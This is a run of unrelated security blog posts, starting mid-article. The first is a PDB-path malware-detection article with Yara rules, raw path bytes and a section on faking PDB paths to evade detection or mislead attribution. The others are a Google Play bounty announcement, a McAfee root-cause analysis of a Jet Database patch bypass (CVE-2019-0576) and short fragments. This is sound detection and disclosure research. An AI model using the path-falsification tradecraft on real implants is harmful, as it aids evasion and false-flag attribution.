Families and groups observed: AGENTTESLA, BANKSHOT, BEACON, BIRDSEED, BLACKBELT, BRIGHTCOMB, BUGJUICE, CAMUBOT, CARDDROP, CETTRA, CHIPSHOT, COOKIECLOG, CURVEBALL, DARKMOON, DESERTFALCON, DIMWIT, ELISE, EXTRAMAYO, FIDDLELOG, FIDDLEWOOD, FLUXXY, FON, GEARSHIFT, GH0ST, HANDSTAMP, HAWKEYE, HIGHNOON, HIKIT, ICEFOG, IMMINENTMONITOR, ISMAGENT, KASPER, KAZYBOT, LIMITLESS, LOKIBOT, LUMBERJACK, MOONRAT, ORCUSRAT, PLANEDOWN, PLANEPATCH, POSEIDON, POSHC2, PUBNUBRAT, PUPYRAT, QUASARRAT, RABBITHOLE, RATVERMIN, RAWHIDE, REDTAPE, RYUK, SAKABOTA, SAMAS, SEEGAP, SEEKEYS, SKIDHOOK, SOGU, SWEETCANDLE, SWEETTEA, TRAVELNET, TRICKBOT, TROCHILUS, UPCONTROL, UPDATESEE, UROBUROS, WASHBOARD, WHITEWALK, WINERACK, XTREMERAT, ZXSHELL; APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495
Example (three PDB paths from a single TRICKBOT sample):
D:\MyProjects\spreader\Release\spreader_x86.pdb
D:\MyProjects\spreader\Release\ssExecutor_x86.pdb
D:\MyProjects\spreader\Release\screenLocker_x86.pdb

Outside of a debug section
Families and groups observed: ABBEYROAD, AGENTTESLA, BEACON, BLACKSHADESRAT, CHIMNEYDIP, CITADEL, COOKIECLOG, COREBOT, CRACKSHOT, DAYJOB, DIRTCHEAP, DIZZYLOG, DUSTYSKY, EARTHWORM, EIGHTONE, ELISE, EXTRAMAYO, FRONTWHEEL, GELCAPSULE, GH0ST, HAWKEYE, HIGHNOON, KAYSLICE, LEADPENCIL, LOKIBOT, METASTAGE, METERPRETER, MURKYTOP, NUTSHELL, ORCUSRAT, OUTLOOKDUMP, PACMAN, POISONIVY, PLANEPATCH, PONY, PUPYRAT, RATVERMIN, SAKABOTA, SANDTRAP, SEADADDY, SEEDOOR, SHORTLEASH, SOGU, SOULBOT, TERA, TIXKEYS, UPCONTROL, WHIPSNAP, WHITEWALK, XDOOR, XTUNNEL; APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575

Nulled-out PDB paths
Families and groups observed: HIGHNOON, SANNY, PHOTO, TERA, SOYSAUCE, VIPER, FIDDLEWOOD, BLACKDOG, FLUSHSHOW, NJRAT, LONGCUT; APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511

Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

The internet is a weird place, and at a big enough scale, you end up seeing things you never thought you would: things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of the samples below may be the result of errors, corruption, obfuscation, or various forms of intentional manipulation. We demonstrate them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples is from a confirmed malware sample.

Shenanigan

Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462

 

Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles

Text Path: C::\\QQQQQQQQ\VVVVVVVVVVVVVVVVV.pdb

Short

Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text path:

\\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples
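The “Full Raw” values above follow the PE CodeView 7.0 debug record layout: a 4-byte “RSDS” signature, a 16-byte GUID, a 4-byte little-endian age, and then the null-terminated PDB path. As a rough sketch of how a parser might pull those fields apart (using the “Spaced out” record from Figure 15 as input):

```python
import struct

def parse_rsds(blob: bytes):
    """Parse a CodeView 7.0 (RSDS) debug record: 4-byte signature,
    16-byte GUID, 4-byte little-endian age, null-terminated path."""
    if blob[:4] != b"RSDS":
        raise ValueError("not an RSDS record")
    guid = blob[4:20].hex()  # raw bytes as hex, not canonical GUID form
    (age,) = struct.unpack("<I", blob[20:24])
    path = blob[24:].split(b"\x00", 1)[0].decode("latin-1")
    return guid, age, path

# The "Spaced out" record: "D:\" + 33 spaces + ".pdb"
raw = (bytes.fromhex("52534453"                          # "RSDS"
                     "A7FBBBFE5C41A545896EF92F71CD1F08"  # GUID bytes
                     "01000000")                         # age = 1
       + b"D:\\" + b" " * 33 + b".pdb\x00")
guid, age, path = parse_rsds(raw)
```

A robust parser has to tolerate every shenanigan in the table above, including missing null terminators, embedded nulls, and non-ASCII bytes, which is why this sketch decodes with latin-1 rather than assuming valid UTF-8.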

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb

Regin

Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, a nouveau nomenclature that the general public may be adopting long after its purported use by Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:

APT29

Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.

ConventionEngine

We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” after the industry jokes that security vendors like to talk about their elite detection “engines,” but behind the green curtain they’re all just a code spaghetti mess of scripts and signatures, which this absolutely started as.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.
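As a hypothetical illustration of the haystack idea (the keyword lists and tier names below are invented for this sketch, not the actual ConventionEngine rule contents), triage logic might route matches by signal-to-noise tier:

```python
# Hypothetical keyword tiers for illustration only -- not the real
# ConventionEngine rule contents.
HIGH_SNR = ("keylog", "rootkit", "ransom", "shellcode", "implant")
LOW_SNR = ("desktop", "debug", "users")

def triage(pdb_path: str) -> str:
    """Bucket a PDB path into a haystack by keyword signal strength."""
    p = pdb_path.lower()
    if any(k in p for k in HIGH_SNR):
        return "analyst-review"  # high SNR: route straight to an analyst
    if any(k in p for k in LOW_SNR):
        return "log-context"     # low SNR: log for contextualization only
    return "no-match"

verdict = triage(r"D:\smiller\projects\offensive_loaders"
                 r"\shellcode\hello\hellol\Debug\hellol.pdb")
```

In practice, each tier would feed a differently sized haystack: the low-SNR bucket goes to automated logging, the high-SNR bucket to a human.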

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on GitHub being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy about putting full code packages right into the repositories, and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, representing a considerable intelligence gain about the malware’s original development environment. We used what we found in the PDB itself to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on GitHub. But there are some other occasions too: sometimes malware source code will get inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes malware source code will be left in open directories; and sometimes malware source code will get uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2
{
    meta:
        author = "@stvemillertime"
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
    condition:
        $hex at 0
}

rule PDB_Header_V7
{
    meta:
        author = "@stvemillertime"
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
    condition:
        $hex at 0
}
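For sorting loose files outside of Yara, the same two header checks can be expressed as a small Python sketch:

```python
# The PDB 2.00 and MSF 7.00 header magics, matching the Yara rules above.
PDB2_MAGIC = b"Microsoft C/C++ program database 2.00\r\n"
PDB7_MAGIC = b"Microsoft C/C++ MSF 7.00"

def pdb_version(data: bytes):
    """Return 2 or 7 for a recognized PDB header magic, else None."""
    if data.startswith(PDB7_MAGIC):
        return 7
    if data.startswith(PDB2_MAGIC):
        return 2
    return None
```

Run against the first few dozen bytes of each candidate file; anything that returns a version number is worth a closer look.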

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb
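A quick, illustrative sketch of how one might flag such toolmarks, with a marker list derived from the example paths above (not exhaustive, and purely an assumption for demonstration):

```python
# Marker list drawn from the example CI/CD paths above; illustrative,
# not exhaustive.
CI_MARKERS = ("jenkins", "bamboo", "teamcity", "buildagent",
              "build-dir", "xml-data")

def looks_like_ci_build(pdb_path: str) -> bool:
    """Heuristic: does this PDB path carry build-server toolmarks?"""
    p = pdb_path.lower()
    return any(m in p for m in CI_MARKERS)
```

Note that this heuristic cuts both ways: a defender can use it to lower the priority of a match, and an attacker can deliberately satisfy it.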

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb
Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

This project compiled in Debug configuration by default places both the hellol.exe file and the hellol.pdb file under

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\Debug\


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio taskbar, select Project > Properties, then in the side pane select Linker > Debugging and fill the option box for “Generate Program Database File.” This option accepts Visual Studio macros so there is plenty of flexibility for scripting and creating custom build configurations for falsifying or randomizing PDB paths.


Figure 18: hellol project Properties showing defaults for the PDB path


Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw ConsoleApplication1.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. Alternatively, if building at the command line, you could specify /PDBALTPATH, which creates a PDB file name that does not rely on the file structure of the build computer.


Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to be compiled on a CI/CD server which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? For whatever reason, if there is PDB manipulation to be done, it is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talked about malware would ultimately lead to the possibility of detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.

Conclusions

If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have been historically successful in using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using many of the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and they routinely labeled their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, outside of the descriptors of the malware development files and environment, when PDB files are present, we identified anomalies that help us identify files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

Recommended Reading and Resources

Inspiring Research
Debugging and Symbols
Debug Directory and CodeView
Debugging and Visual Studio
PDB File Structure
PDB File Tools
ConventionEngine Rules

Expanding bug bounties on Google Play

Posted by Adam Bacchus, Sebastian Porst, and Patrick Mutchler — Android Security & Privacy

[Cross-posted from the Android Developers Blog]

We’re constantly looking for ways to further improve the security and privacy of our products, and the ecosystems they support. At Google, we understand the strength of open platforms and ecosystems, and that the best ideas don’t always come from within. It is for this reason that we offer a broad range of vulnerability reward programs, encouraging the community to help us improve security for everyone. Today, we’re expanding on those efforts with some big changes to Google Play Security Reward Program (GPSRP), as well as the launch of the new Developer Data Protection Reward Program (DDPRP).

Google Play Security Reward Program Scope Increases

We are increasing the scope of GPSRP to include all apps in Google Play with 100 million or more installs. These apps are now eligible for rewards, even if the app developers don’t have their own vulnerability disclosure or bug bounty program. In these scenarios, Google helps responsibly disclose identified vulnerabilities to the affected app developer. This opens the door for security researchers to help hundreds of organizations identify and fix vulnerabilities in their apps. If the developers already have their own programs, researchers can collect rewards directly from them on top of the rewards from Google. We encourage app developers to start their own vulnerability disclosure or bug bounty program to work directly with the security researcher community.

Vulnerability data from GPSRP helps Google create automated checks that scan all apps available in Google Play for similar vulnerabilities. Affected app developers are notified through the Play Console as part of the App Security Improvement (ASI) program, which provides information on the vulnerability and how to fix it. Over its lifetime, ASI has helped more than 300,000 developers fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users until the issue is fixed.

To date, GPSRP has paid out over $265,000 in bounties. Recent scope and reward increases have resulted in $75,500 in rewards across July & August alone. With these changes, we anticipate even further engagement from the security research community to bolster the success of the program.

Introducing the Developer Data Protection Reward Program

Today, we are also launching the Developer Data Protection Reward Program. DDPRP is a bounty program, in collaboration with HackerOne, meant to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions. It recognizes the contributions of individuals who help report apps that are violating Google Play, Google API, or Google Chrome Web Store Extensions program policies.

The program aims to reward anyone who can provide verifiable and unambiguous evidence of data abuse, in a similar model as Google’s other vulnerability reward programs. In particular, the program aims to identify situations where user data is being used or sold unexpectedly, or repurposed in an illegitimate way without user consent. If data abuse is identified related to an app or Chrome extension, that app or extension will accordingly be removed from Google Play or the Chrome Web Store. In the case of an app developer abusing access to Gmail restricted scopes, their API access will be removed. While no reward table or maximum reward is listed at this time, depending on impact, a single report could net a bounty as large as $50,000.

As 2019 continues, we look forward to seeing what researchers find next. Thank you to the entire community for contributing to keeping our platforms and ecosystems safe. Happy bug hunting!

After “No”

Part of a privacy professional’s job is the development of processes and policies to manage the consent of an individual. When someone does consent to their information being processed, there should be a means to record that they have done so and also a way for that individual to revoke their consent or opt-out of […]

The post After “No” appeared first on Privacy Ref.

Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423

Introduction

As of July 2019, Microsoft has fixed around 43 bugs in the Jet Database Engine. McAfee has reported a couple of bugs and, so far, we have received 10 CVEs from Microsoft. In our previous post, we discussed the root cause of CVE-2018-8423. While analyzing this CVE and Microsoft’s patch for it, we found a way to bypass the patch, which resulted in another crash. We reported it to Microsoft, which fixed it in the January 2019 Patch Tuesday release; the issue was assigned CVE-2019-0576. We recommend that users install the appropriate patches, follow a proper patch management policy, and keep their Windows installations up to date.

In this post we will do the root cause analysis of CVE-2019-0576. To exploit this vulnerability, an attacker needs to use social engineering techniques to convince a victim to open a JavaScript file which uses an ADODB connection object to access a malicious Jet Database file. Once the malicious Jet Database file is accessed, it calls the vulnerable function in msrd3x40.dll which can lead to exploitation of this vulnerability.

Background

As mentioned in our previous post, CVE-2018-8423 can be triggered using a malicious Jet Database file and, as per the analysis, this issue was in the index number field. If the index number was too big the program would crash at the following location:

Here, ecx contains the malicious index number. On applying the Microsoft patch for CVE-2018-8423 we can see that, on opening this malicious file, we get the following error which denotes that the issue is fixed, and the crash does not occur anymore:

 

Analyzing the Patch

We decided to dig deeper and see exactly how this issue was patched. On analyzing the “msrd3x40!TblPage::CreateIndexes” function, we can see that there is a check for whether “IndexNumber” is greater than 0xFF (255), as can be seen below:

 

Here, the ecx which contains the index number has the malicious value of “00002300” and it is greater than 0xFF. If we see the code, there is a jump instruction. If we follow this jump instruction, we reach the following location:

We can see that there is a call to the “msrd3x40!Err::SetError” function, meaning the malicious file will not be parsed if the index value is greater than 0xFF and the program will give the error message “Unrecognized database format” and terminate.

Finding Another Issue with the Patch

By looking at the patch, it was obvious that the program would terminate if the index value was greater than 0xFF, but we decided to try an index value of “00 00 00 20”, which is less than 0xFF, and we got another crash, in the function “msrd3x40!Table::FindIndexFromName”, as can be seen below:

Finding the Root Cause of the New Issue

As we know, if we give any index value which is less than 0xFF, we get a crash in the function “msrd3x40!Table::FindIndexFromName”, so we decided to analyze it further to find out why that is happening.

The crash is at the following location:

It seems that the program is trying to access the location “[ebx+eax*4+574h]” but it is not accessible, meaning this is an Out of Bound Read issue.

This crash looks familiar as it was also seen in CVE-2018-8423, except that it was an Out of Bound Write, while this seems to be an Out of Bound Read. If we look at eax it contains “0055b7a8” which, when multiplied by 4, becomes a very large value.

If we look at the file it looks like this:

As can be seen in below image, if we parse this file, this value of “00 00 00 20” (in little endian from the above image), denotes the number of an index whose name is “ParentIDName”:

Looking at the debugger at the point of the crash, it seems that ebx+574h points to a memory location and eax contains an index value which is getting multiplied by 4. Now we need to figure out the following:

  1. What will be the value of eax that will cause the crash? We know that it should be less than 0xFF. But what would be the lowest value?
  2. What is the root cause of this issue?

On setting a breakpoint on “msrd3x40!Table::FindIndexFromName” and changing the index number to “0000001f” (which does not cause a crash but helps with debugging and understanding the program flow), we can see that edx contains the pointer to an index name which, in this case, is “ParentIdName”:

Debugging further we can see that the eax value comes from [ebp] and the ebp value comes from [ebx+5F4h] as can be seen below:

When we look at “ebx+5F4” we can see the following:

We can see that “ebx+5F4” contains the index numbers for all the indexes in the file. In our case the file has two indexes and their numbers are “00 00 00 01” and “00 00 00 1f”. If we carefully review the memory, we can figure out that the maximum number of indexes which can be stored here is 0x20, or 32:

Start location: 00718d54

Each index number is 4 bytes long, so 0x20 * 4 + 0x00718d54 = 0x00718DD4.

After this, if we look at ebx+574+4, we can see that it contains the pointer to index names:

So, the overall memory structure is like this:

There are only 0x80, or 128, bytes available to save index name pointers at location EBX+574. Each pointer gets saved at its index number’s slot, i.e. the pointer for index number 1 will be saved at EBX+574+1*4, the pointer for index number 2 at EBX+574+2*4, and so on (index numbers start from 0).

In this case, if we give an index number which is more than 31, the program will overwrite data past 0x80 bytes, which will be at the start of the EBX+5F4 location, which is the index number from the malicious file. So, in this case, if we give the value “00 00 00 20” instead of “00 00 00 1f”, it will overwrite the index number at the EBX+5F4 location, as can be seen below:

Now the program tries to execute this instruction in “msrd3x40!Table::FindIndexFromName”:

mov ecx, dword ptr [ebx+eax*4+574h]

Here, eax contains the index number, which should be “00 00 00 01” but has been overwritten with “0055b7a8”, a memory address. On multiplying it by 4, it becomes a huge number, and then 574h is added to it. If the resulting memory area does not exist and the program tries to read from it, we get an access violation error.

So, to answer the questions we had:

  1. Any value which is less than 0xFF and greater than 0x1F (31) will cause a crash if the resulting memory location from [ebx+eax*4+574h] is not accessible.
  2. The root cause is that an index number is getting overwritten by a memory location, causing invalid memory access in this case.
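The offset arithmetic behind that overwrite can be checked with a small model of the layout described above (offsets taken from the analysis):

```python
# Offsets from the analysis above: 32 four-byte name-pointer slots at
# EBX+574h run right up against the index-number array at EBX+5F4h.
NAME_PTR_BASE = 0x574
INDEX_NUM_BASE = 0x5F4
SLOT_SIZE = 4
MAX_SLOTS = (INDEX_NUM_BASE - NAME_PTR_BASE) // SLOT_SIZE  # 0x20 slots

def slot_offset(index_number: int) -> int:
    """Where the name pointer for a given index number is written."""
    return NAME_PTR_BASE + index_number * SLOT_SIZE
```

Index number 0x1F lands on the last in-bounds slot (offset 0x5F0), while 0x20 writes exactly at 0x5F4, clobbering the first parsed index number, which is precisely the overwrite described above.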

How is it Fixed by Microsoft in the January 2019 Patch?

We again decided to analyze the patch to see how this issue was fixed. As is clear from the analysis, any value which is greater than or equal to 0x20 (32) still causes a crash so, ideally, the patch should check for this. Microsoft added this check in the January 2019 patch release, as can be seen below:

As can be seen in the above image, eax holds the index value here and it is compared with 0x20. If it is greater than or equal to 0x20, the program jumps to location 72fe1c00. If we go to that location, we can see the following:

As can be seen in the above image, it calls the destructor and then calls the msrd3x40!Err::SetError function and returns. The program will display the message “Unrecognized database format” and then terminate.

Conclusion

We reported this issue to Microsoft in October 2018, and Microsoft fixed it in the January 2019 Patch Tuesday release, assigning CVE-2019-0576 to this issue. We recommend our users keep their Windows installations up to date and install vendor patches on a regular basis.

McAfee Coverage:

McAfee Network Security Platform customers are protected from this vulnerability by Signature IDs 0x45251700 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2018-8423) and 0x4525890 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2019-0576).

McAfee AV detects the malicious file as BackDoor-DKI.dr.

McAfee HIPS, Generic Buffer Overflow Protection (GBOP) feature will often cover this, depending on the process used to exploit the vulnerability.

References

The post Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423 appeared first on McAfee Blogs.

14 Million Customers Affected By Hostinger Breach: How to Secure Your Data

